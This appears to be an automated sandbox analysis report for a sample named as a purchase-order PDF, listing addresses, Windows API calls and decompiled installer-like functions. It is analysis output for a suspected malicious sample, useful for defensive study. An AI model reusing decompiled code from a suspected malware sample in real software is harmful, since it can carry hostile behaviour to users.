                                            0x004059ba
                                            0x004059de
                                            0x004059de
                                            0x004059f1
                                            0x00405a0f
                                            0x00405a11
                                            0x00405a19
                                            0x00405a6f
                                            0x00405a73
                                            0x00000000
                                            0x00000000
                                            0x00405a75
                                            0x00405a7b
                                            0x00000000
                                            0x00000000
                                            0x00405a85
                                            0x00405a8d
                                            0x00405a90
                                            0x00405b92
                                            0x00000000
                                            0x00405b92
                                            0x00405a9f
                                            0x00405aaa
                                            0x00405ab3
                                            0x00405abe
                                            0x00405ac1
                                            0x00405aca
                                            0x00405ad0
                                            0x00405ad3
                                            0x00405ad3
                                            0x00405aeb
                                            0x00405af4
                                            0x00405af7
                                            0x00405afe
                                            0x00405b05
                                            0x00405b0d
                                            0x00405b0d
                                            0x00405b24
                                            0x00405b24
                                            0x00405b2b
                                            0x00405b31
                                            0x00405b3d
                                            0x00405b44
                                            0x00405b4d
                                            0x00405b4f
                                            0x00405b52
                                            0x00405b61
                                            0x00405b64
                                            0x00405b6a
                                            0x00405b6b
                                            0x00405b71
                                            0x00405b72
                                            0x00405b73
                                            0x00405b7b
                                            0x00405b86
                                            0x00405b8c
                                            0x00405b8c
                                            0x00000000
                                            0x00405aeb
                                            0x00405a21
                                            0x00405a51
                                            0x00405a59
                                            0x00405a64
                                            0x00405a64
                                            0x00405a6a
                                            0x00000000
                                            0x00405a6a
                                            0x00405a25
                                            0x00405a2f
                                            0x00000000
                                            0x004059f3
                                            0x004059f9
                                            0x00405a34
                                            0x00000000
                                            0x00405a3d
                                            0x00405a02
                                            0x00405a07
                                            0x00405a0a
                                            0x00000000
                                            0x00405a0a
                                            0x004059f1
                                            0x0040582a
                                            0x0040582e
                                            0x00405836
                                            0x0040583a
                                            0x0040583d
                                            0x00405840
                                            0x00405843
                                            0x00405846
                                            0x00405847
                                            0x00405848
                                            0x00405861
                                            0x00405864
                                            0x0040586e
                                            0x0040587d
                                            0x00405885
                                            0x0040588d
                                            0x00405892
                                            0x00405895
                                            0x004058a1
                                            0x004058aa
                                            0x004058b3
                                            0x004058d5
                                            0x004058db
                                            0x004058ec
                                            0x004058f1
                                            0x004058ff
                                            0x0040590d
                                            0x0040590d
                                            0x00405912
                                            0x00405920
                                            0x00405920
                                            0x00405925
                                            0x00405928
                                            0x0040592d
                                            0x00405939
                                            0x00405942
                                            0x0040594f
                                            0x0040595e
                                            0x00405951
                                            0x00405956
                                            0x00405956
                                            0x0040596a
                                            0x0040596a
                                            0x0040597e
                                            0x00405987
                                            0x00405990
                                            0x004059a0
                                            0x004059ac
                                            0x004059ac
                                            0x00000000

                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 00405867
                                            • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                            • GetClientRect.USER32(?,?), ref: 004058B3
                                            • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                            • ShowWindow.USER32(?,00000008), ref: 00405956
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                            • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                            • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                            • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                            • ShowWindow.USER32(00000000), ref: 00405A02
                                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                                            • ShowWindow.USER32(00000008), ref: 00405A51
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                            • CreatePopupMenu.USER32 ref: 00405A96
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                            • GetWindowRect.USER32(?,?), ref: 00405ACA
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                                            • EmptyClipboard.USER32 ref: 00405B31
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                            • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                            • CloseClipboard.USER32 ref: 00405B8C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: H7B${
                                            • API String ID: 590372296-2256286769
                                            • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                            • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				long _v16;
                                            				long _v20;
                                            				long _v24;
                                            				char _v28;
                                            				intOrPtr _v32;
                                            				long _v36;
                                            				char _v40;
                                            				unsigned int _v44;
                                            				signed int _v48;
                                            				WCHAR* _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				WCHAR* _v72;
                                            				void _v76;
                                            				struct HWND__* _v80;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr _t82;
                                            				long _t87;
                                            				short* _t89;
                                            				void* _t95;
                                            				signed int _t96;
                                            				int _t109;
                                            				signed short _t114;
                                            				signed int _t118;
                                            				struct HWND__** _t122;
                                            				intOrPtr* _t138;
                                            				WCHAR* _t146;
                                            				unsigned int _t150;
                                            				signed int _t152;
                                            				unsigned int _t156;
                                            				signed int _t158;
                                            				signed int* _t159;
                                            				signed int* _t160;
                                            				struct HWND__* _t166;
                                            				struct HWND__* _t167;
                                            				int _t169;
                                            				unsigned int _t197;
                                            
                                            				_t156 = __edx;
                                            				_t82 =  *0x422720;
                                            				_v32 = _t82;
                                            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                            				if(_a8 == 0x40b) {
                                            					E00405CAC(0x3fb, _t146);
                                            					E004068EF(_t146);
                                            				}
                                            				_t167 = _a4;
                                            				if(_a8 != 0x110) {
                                            					L8:
                                            					if(_a8 != 0x111) {
                                            						L20:
                                            						if(_a8 == 0x40f) {
                                            							L22:
                                            							_v8 = _v8 & 0x00000000;
                                            							_v12 = _v12 & 0x00000000;
                                            							E00405CAC(0x3fb, _t146);
                                            							if(E0040603F(_t186, _t146) == 0) {
                                            								_v8 = 1;
                                            							}
                                            							E00406668(0x421718, _t146);
                                            							_t87 = E00406A35(1);
                                            							_v16 = _t87;
                                            							if(_t87 == 0) {
                                            								L30:
                                            								E00406668(0x421718, _t146);
                                            								_t89 = E00405FE2(0x421718);
                                            								_t158 = 0;
                                            								if(_t89 != 0) {
                                            									 *_t89 = 0;
                                            								}
                                            								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                            									goto L35;
                                            								} else {
                                            									_t169 = 0x400;
                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                            									asm("cdq");
                                            									_v48 = _t109;
                                            									_v44 = _t156;
                                            									_v12 = 1;
                                            									goto L36;
                                            								}
                                            							} else {
                                            								_t159 = 0;
                                            								if(0 == 0x421718) {
                                            									goto L30;
                                            								} else {
                                            									goto L26;
                                            								}
                                            								while(1) {
                                            									L26:
                                            									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                            									if(_t114 != 0) {
                                            										break;
                                            									}
                                            									if(_t159 != 0) {
                                            										 *_t159 =  *_t159 & _t114;
                                            									}
                                            									_t160 = E00405F83(0x421718);
                                            									 *_t160 =  *_t160 & 0x00000000;
                                            									_t159 = _t160;
                                            									 *_t159 = 0x5c;
                                            									if(_t159 != 0x421718) {
                                            										continue;
                                            									} else {
                                            										goto L30;
                                            									}
                                            								}
                                            								_t150 = _v44;
                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                            								_v44 = _t150 >> 0xa;
                                            								_v12 = 1;
                                            								_t158 = 0;
                                            								__eflags = 0;
                                            								L35:
                                            								_t169 = 0x400;
                                            								L36:
                                            								_t95 = E00404F52(5);
                                            								if(_v12 != _t158) {
                                            									_t197 = _v44;
                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                            										_v8 = 2;
                                            									}
                                            								}
                                            								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                            									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                            									if(_v12 == _t158) {
                                            										SetDlgItemTextW(_a4, _t169, 0x421708);
                                            									} else {
                                            										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                            									}
                                            								}
                                            								_t96 = _v8;
                                            								 *0x42a304 = _t96;
                                            								if(_t96 == _t158) {
                                            									_v8 = E0040140B(7);
                                            								}
                                            								if(( *(_v32 + 0x14) & _t169) != 0) {
                                            									_v8 = _t158;
                                            								}
                                            								E004045E6(0 | _v8 == _t158);
                                            								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                            									E00404A0E();
                                            								}
                                            								 *0x423738 = _t158;
                                            								goto L53;
                                            							}
                                            						}
                                            						_t186 = _a8 - 0x405;
                                            						if(_a8 != 0x405) {
                                            							goto L53;
                                            						}
                                            						goto L22;
                                            					}
                                            					_t118 = _a12 & 0x0000ffff;
                                            					if(_t118 != 0x3fb) {
                                            						L12:
                                            						if(_t118 == 0x3e9) {
                                            							_t152 = 7;
                                            							memset( &_v76, 0, _t152 << 2);
                                            							_v80 = _t167;
                                            							_v72 = 0x423748;
                                            							_v60 = E00404E0B;
                                            							_v56 = _t146;
                                            							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                            							_t122 =  &_v80;
                                            							_v64 = 0x41;
                                            							__imp__SHBrowseForFolderW(_t122);
                                            							if(_t122 == 0) {
                                            								_a8 = 0x40f;
                                            							} else {
                                            								__imp__CoTaskMemFree(_t122);
                                            								E00405F37(_t146);
                                            								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                            								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Alvin\\AppData\\Local\\Temp") {
                                            									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                            									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                            										lstrcatW(_t146, 0x428200);
                                            									}
                                            								}
                                            								 *0x423738 =  *0x423738 + 1;
                                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                            							}
                                            						}
                                            						goto L20;
                                            					}
                                            					if(_a12 >> 0x10 != 0x300) {
                                            						goto L53;
                                            					}
                                            					_a8 = 0x40f;
                                            					goto L12;
                                            				} else {
                                            					_t166 = GetDlgItem(_t167, 0x3fb);
                                            					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                            						E00405F37(_t146);
                                            					}
                                            					 *0x429238 = _t167;
                                            					SetWindowTextW(_t166, _t146);
                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                            					_push(1);
                                            					E004045C4(_t167);
                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                            					_push(0x14);
                                            					E004045C4(_t167);
                                            					E004045F9(_t166);
                                            					_t138 = E00406A35(8);
                                            					if(_t138 == 0) {
                                            						L53:
                                            						return E0040462B(_a8, _a12, _a16);
                                            					} else {
                                            						 *_t138(_t166, 1);
                                            						goto L8;
                                            					}
                                            				}
                                            			}













































                                            0x00404ab5
                                            0x00404abb
                                            0x00404ac1
                                            0x00404ace
                                            0x00404adc
                                            0x00404adf
                                            0x00404ae7
                                            0x00404aed
                                            0x00404aed
                                            0x00404af9
                                            0x00404afc
                                            0x00404b6a
                                            0x00404b71
                                            0x00404c48
                                            0x00404c4f
                                            0x00404c5e
                                            0x00404c5e
                                            0x00404c62
                                            0x00404c6c
                                            0x00404c79
                                            0x00404c7b
                                            0x00404c7b
                                            0x00404c89
                                            0x00404c90
                                            0x00404c97
                                            0x00404c9a
                                            0x00404cd6
                                            0x00404cd8
                                            0x00404cde
                                            0x00404ce3
                                            0x00404ce7
                                            0x00404ce9
                                            0x00404ce9
                                            0x00404d05
                                            0x00000000
                                            0x00404d07
                                            0x00404d0a
                                            0x00404d18
                                            0x00404d1e
                                            0x00404d1f
                                            0x00404d22
                                            0x00404d25
                                            0x00000000
                                            0x00404d25
                                            0x00404c9c
                                            0x00404c9e
                                            0x00404ca2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404ca4
                                            0x00404ca4
                                            0x00404cb1
                                            0x00404cb6
                                            0x00000000
                                            0x00000000
                                            0x00404cba
                                            0x00404cbc
                                            0x00404cbc
                                            0x00404cc5
                                            0x00404cc7
                                            0x00404ccc
                                            0x00404ccf
                                            0x00404cd4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404cd4
                                            0x00404d31
                                            0x00404d3b
                                            0x00404d3e
                                            0x00404d41
                                            0x00404d48
                                            0x00404d48
                                            0x00404d4a
                                            0x00404d4a
                                            0x00404d4f
                                            0x00404d51
                                            0x00404d59
                                            0x00404d60
                                            0x00404d62
                                            0x00404d6d
                                            0x00404d6d
                                            0x00404d62
                                            0x00404d7d
                                            0x00404d87
                                            0x00404d8f
                                            0x00404daa
                                            0x00404d91
                                            0x00404d9a
                                            0x00404d9a
                                            0x00404d8f
                                            0x00404daf
                                            0x00404db4
                                            0x00404db9
                                            0x00404dc2
                                            0x00404dc2
                                            0x00404dcb
                                            0x00404dcd
                                            0x00404dcd
                                            0x00404dd9
                                            0x00404de1
                                            0x00404deb
                                            0x00404deb
                                            0x00404df0
                                            0x00000000
                                            0x00404df0
                                            0x00404c9a
                                            0x00404c51
                                            0x00404c58
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404c58
                                            0x00404b77
                                            0x00404b80
                                            0x00404b9a
                                            0x00404b9f
                                            0x00404ba9
                                            0x00404bb0
                                            0x00404bbc
                                            0x00404bbf
                                            0x00404bc2
                                            0x00404bc9
                                            0x00404bd1
                                            0x00404bd4
                                            0x00404bd8
                                            0x00404bdf
                                            0x00404be7
                                            0x00404c41
                                            0x00404be9
                                            0x00404bea
                                            0x00404bf1
                                            0x00404bfb
                                            0x00404c03
                                            0x00404c10
                                            0x00404c24
                                            0x00404c28
                                            0x00404c28
                                            0x00404c24
                                            0x00404c2d
                                            0x00404c3a
                                            0x00404c3a
                                            0x00404be7
                                            0x00000000
                                            0x00404b9f
                                            0x00404b8d
                                            0x00000000
                                            0x00000000
                                            0x00404b93
                                            0x00000000
                                            0x00404afe
                                            0x00404b0b
                                            0x00404b14
                                            0x00404b21
                                            0x00404b21
                                            0x00404b28
                                            0x00404b2e
                                            0x00404b37
                                            0x00404b3a
                                            0x00404b3d
                                            0x00404b45
                                            0x00404b48
                                            0x00404b4b
                                            0x00404b51
                                            0x00404b58
                                            0x00404b5f
                                            0x00404df6
                                            0x00404e08
                                            0x00404b65
                                            0x00404b68
                                            0x00000000
                                            0x00404b68
                                            0x00404b5f

                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                            • lstrcmpiW.KERNEL32(Fosklcks,00423748,00000000,?,?), ref: 00404C1C
                                            • lstrcatW.KERNEL32(?,Fosklcks), ref: 00404C28
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Local\Temp$Fosklcks$H7B
                                            • API String ID: 2624150263-1450996773
                                            • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                            • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E004021AA() {
                                            				signed int _t52;
                                            				void* _t56;
                                            				intOrPtr* _t60;
                                            				intOrPtr _t61;
                                            				intOrPtr* _t62;
                                            				intOrPtr* _t64;
                                            				intOrPtr* _t66;
                                            				intOrPtr* _t68;
                                            				intOrPtr* _t70;
                                            				intOrPtr* _t72;
                                            				intOrPtr* _t74;
                                            				intOrPtr* _t76;
                                            				intOrPtr* _t78;
                                            				intOrPtr* _t80;
                                            				void* _t83;
                                            				intOrPtr* _t91;
                                            				signed int _t101;
                                            				signed int _t105;
                                            				void* _t107;
                                            
                                            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                            				_t52 =  *(_t107 - 0x20);
                                            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                            				_t101 = _t52 & 0x00008000;
                                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                            				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                            					E00402DA6(0x21);
                                            				}
                                            				_t56 = _t107 + 8;
                                            				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                            				if(_t56 < _t83) {
                                            					L14:
                                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                                            					_push(0xfffffff0);
                                            				} else {
                                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                            					if(_t61 >= _t83) {
                                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                                            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                            						if(_t101 == _t83) {
                                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Alvin\\AppData\\Local\\Temp");
                                            						}
                                            						if(_t105 != _t83) {
                                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                            						}
                                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                            						if( *_t91 != _t83) {
                                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                            						}
                                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                            						}
                                            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                            					}
                                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                            						_push(0xfffffff4);
                                            					} else {
                                            						goto L14;
                                            					}
                                            				}
                                            				E00401423();
                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                            				return 0;
                                            			}






















                                            0x004021b3
                                            0x004021bd
                                            0x004021c7
                                            0x004021d1
                                            0x004021dc
                                            0x004021df
                                            0x004021f9
                                            0x004021fc
                                            0x00402202
                                            0x00402205
                                            0x0040220f
                                            0x00402213
                                            0x00402213
                                            0x00402218
                                            0x00402229
                                            0x00402231
                                            0x004022e8
                                            0x004022e8
                                            0x004022ef
                                            0x00402237
                                            0x00402237
                                            0x00402246
                                            0x0040224a
                                            0x0040224d
                                            0x00402253
                                            0x00402261
                                            0x00402264
                                            0x00402266
                                            0x00402271
                                            0x00402271
                                            0x00402276
                                            0x00402278
                                            0x0040227f
                                            0x0040227f
                                            0x00402282
                                            0x0040228b
                                            0x0040228e
                                            0x00402294
                                            0x00402296
                                            0x004022a0
                                            0x004022a0
                                            0x004022a3
                                            0x004022ac
                                            0x004022af
                                            0x004022b8
                                            0x004022be
                                            0x004022c0
                                            0x004022ce
                                            0x004022ce
                                            0x004022d1
                                            0x004022d7
                                            0x004022d7
                                            0x004022da
                                            0x004022e0
                                            0x004022e6
                                            0x004022fb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004022e6
                                            0x004022f1
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 542301482-1909526481
                                            • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                            • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E1000270A(struct _EXCEPTION_POINTERS* _a4) {
                                            
                                            				SetUnhandledExceptionFilter(0);
                                            				return UnhandledExceptionFilter(_a4);
                                            			}



                                            0x1000270f
                                            0x1000271f

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,10003783,?,?,?,00000000), ref: 1000270F
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 10002718
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
